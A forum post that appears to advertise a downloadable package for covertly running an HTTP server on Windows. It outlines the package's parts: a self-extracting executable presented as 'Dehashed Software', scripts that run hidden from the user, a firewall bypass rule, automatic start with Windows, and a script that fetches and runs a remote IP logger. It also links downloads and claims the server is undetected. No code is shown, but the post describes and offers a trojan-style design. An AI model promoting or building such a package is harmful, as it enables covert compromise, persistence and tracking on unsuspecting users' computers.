Start a hidden http server

Discussion forum for all Windows batch related topics.

Moderator: DosItHelp

Post Reply
Message
Author
hacxx
Posts: 57
Joined: 09 Apr 2015 13:18

Start a hidden http server

#1 Post by hacxx » 31 Oct 2020 14:32

This thread will explain in detail how to create a executable with vbs and batch code to execute a http server. This http server starts automatically with windows.

HIDDEN HTTP SERVER - Hacxx Dehashed Software Tutorial

Hacxx Dehashed Software.exe
The main file - Its a WinRAR SFX

LiteServe\liteserve.exe
LiteServe - Is undetected
LiteServe - Starts with Windows
LiteServe - Is hidden

cool.ico
cool.ico - Just a icon for the main file

vbs.vbs
Executes index.bat hidden from user

index.bat
Add a rule to bypass firewall for liteserve.exe
Executes vbs2.vbs
Executes liteserve.exe

vbs2.vbs
Get a remote file and execute in the machine.
(In this case is a ip logger)

Visit official thread...
https://hacxx.globalfreeforum.com/viewtopic.php?f=2&t=3

Download
https://filecrypt.cc/Container/8544E9459B.html
https://www.file-upload.com/tmekj085z619
https://ddownload.com/rfq6mqn0fl6e

Virus Report
The parts of code that i tweak to made this work are in plain text.

Post Reply